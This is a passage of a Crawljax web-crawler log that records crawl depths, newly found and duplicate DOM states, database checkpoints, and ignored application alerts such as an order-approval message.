com.crawljax.core.Crawler - Crawl depth is now 3 2854857 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state450 and state437 are the same. 2854861 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2857100 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2857479 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 2857479 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 2857485 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 2857780 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 2857782 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 2858249 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2859402 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2860640 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state451 added to the StateMachine. 2860641 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2860650 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2862908 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2864087 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2865247 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2866458 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state452 added to the StateMachine. 2866458 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2866466 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2868756 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2869930 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2871088 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2872309 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Order Number 1234 Was Approved): Order Number 1234 Was Approved Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 2872400 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state453 added to the StateMachine. 2872400 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2872550 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2874802 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2875954 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2877125 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2878366 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state454 added to the StateMachine. 2878366 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2878376 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2880670 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2881824 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2883309 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2884896 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state455 added to the StateMachine. 2884896 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2884905 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2887150 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2888316 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2889606 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2891086 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state456 added to the StateMachine. 2891087 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2891095 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 13 states with unfired actions 2893348 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2894503 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2895814 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2897285 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state457 and state14 are the same. 2897289 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 2899563 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2900749 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2902053 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2903523 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state458 and state26 are the same. 2903527 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 2905782 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2906943 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2908133 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2909320 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state459 added to the StateMachine. 2909320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2909328 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 2911626 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2912795 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2913967 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2915160 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state460 added to the StateMachine. 2915160 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2915169 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 2917397 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2918570 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2919738 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2920961 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state461 added to the StateMachine. 2920961 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2920970 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 2923201 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2924565 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2925743 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2926982 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state462 added to the StateMachine. 2926982 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2926990 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 2929221 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2930372 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2931559 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2932784 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state463 and state451 are the same. 2932787 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 2935011 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2936164 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2937339 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2938542 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state464 added to the StateMachine. 2938542 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2938550 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 11 states with unfired actions 2940797 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2941939 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2943096 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2944320 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state465 added to the StateMachine. 2944320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2944329 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 11 states with unfired actions 2946589 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2947741 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2948900 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2950300 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state466 added to the StateMachine. 2950301 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2950495 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 12 states with unfired actions 2950769 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 11 states with unfired actions 2953016 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2954161 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2955353 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2956633 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state467 added to the StateMachine. 2956633 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2956643 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 10 states with unfired actions 2958913 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2960059 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2961336 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2963146 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state468 added to the StateMachine. 2963146 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2963157 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 10 states with unfired actions 2965427 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2966576 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2967865 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2969561 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state469 and state130 are the same. 2969568 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 2971827 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2972996 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2974306 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2975837 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state470 and state372 are the same. 2975841 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 2978079 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2979224 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2980379 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2981658 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state471 added to the StateMachine. 2981658 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2981672 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 2983954 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2985098 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2986248 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2987451 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state472 added to the StateMachine. 2987451 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2987461 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 2989742 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2990890 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2992051 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2993261 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state473 added to the StateMachine. 2993262 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2993271 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 2995705 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 2996882 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 2998035 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 2999231 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state474 added to the StateMachine. 2999231 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 2999240 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 9 states with unfired actions 3001555 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3002750 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3003909 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3005108 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state475 and state464 are the same. 3005112 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 3007380 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3008542 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3009702 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3010900 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state476 added to the StateMachine. 3010900 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3010909 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 3013363 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3014538 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3015723 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3017071 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state477 added to the StateMachine. 3017072 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3017253 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 3019665 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3020843 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3022149 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3023633 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state478 added to the StateMachine. 3023633 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3023642 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 3025929 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3027095 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3028388 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3029874 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state479 and state26 are the same. 3029878 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 3032160 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3033317 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3034503 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3035703 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state480 added to the StateMachine. 3035704 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3035712 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 3037953 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3039123 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3040278 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3041474 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state481 added to the StateMachine. 3041474 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3041482 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 3043737 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3044918 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3046074 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3047301 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state482 added to the StateMachine. 3047301 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3047310 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 8 states with unfired actions 3049542 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3050694 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3051881 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3053087 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state483 added to the StateMachine. 3053087 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3053095 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3055327 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3056491 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3057828 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3059069 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state484 added to the StateMachine. 3059069 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3059079 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3061343 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3062490 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3063698 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3064941 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Welcome Mr. david): Welcome Mr. david Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 3064963 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state485 added to the StateMachine. 3064963 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3064978 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3067226 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3068382 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3069669 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3071174 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state486 added to the StateMachine. 3071174 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3071184 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3073437 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3074582 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3075866 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3077448 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state487 added to the StateMachine. 3077448 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3077457 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3079704 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3080863 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3081612 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 3081612 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 3081620 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 3081904 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 3081907 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 3082055 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3083326 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state488 added to the StateMachine. 3083327 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3083336 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3085603 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3086750 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3087909 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3089243 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state489 added to the StateMachine. 3089243 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3089253 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3091533 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3092684 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3093844 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3095046 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state490 added to the StateMachine. 3095046 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3095056 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3097324 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3098473 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3099632 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3100844 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state491 added to the StateMachine. 3100844 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3100853 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3103174 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3104357 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3105512 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3106714 [pool-2-thread-2] WARN com.crawljax.browser.WebDriverBackedEmbeddedBrowser - While closing the window, an alert got ignored: Unexpected modal dialog (text: Welcome Mr. david): Welcome Mr. david Build info: version: 'unknown', revision: 'unknown', time: 'unknown' System info: host: '8c4caf89e602', ip: '172.17.0.3', os.name: 'Linux', os.arch: 'amd64', os.version: '3.13.0-74-generic', java.version: '1.7.0_91' Session ID: 2b8b7243-b9bc-4214-892a-c6a47182dff6 Driver info: org.openqa.selenium.firefox.FirefoxDriver Capabilities [{platform=LINUX, acceptSslCerts=true, javascriptEnabled=true, cssSelectorsEnabled=true, databaseEnabled=true, browserName=firefox, handlesAlerts=true, nativeEvents=false, webStorageEnabled=true, rotatable=false, locationContextEnabled=true, applicationCacheEnabled=true, takesScreenshot=true, version=43.0.4}] 3106730 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state492 added to the StateMachine. 3106731 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3106741 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3109035 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3110208 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3111495 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3112976 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state493 added to the StateMachine. 3112977 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3112992 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3115259 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3116415 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3117696 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3119248 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state494 added to the StateMachine. 3119248 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3119256 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3121513 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3122679 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3123841 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3125033 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state495 added to the StateMachine. 3125034 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3125042 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3127373 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3128542 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3129735 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3130932 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state496 added to the StateMachine. 3130933 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3130941 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 7 states with unfired actions 3133212 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3134397 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 3135584 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 3136787 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state497 added to the StateMachine. 3136787 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 3136795 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 6 states with unfired actions 3139043 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 3140225 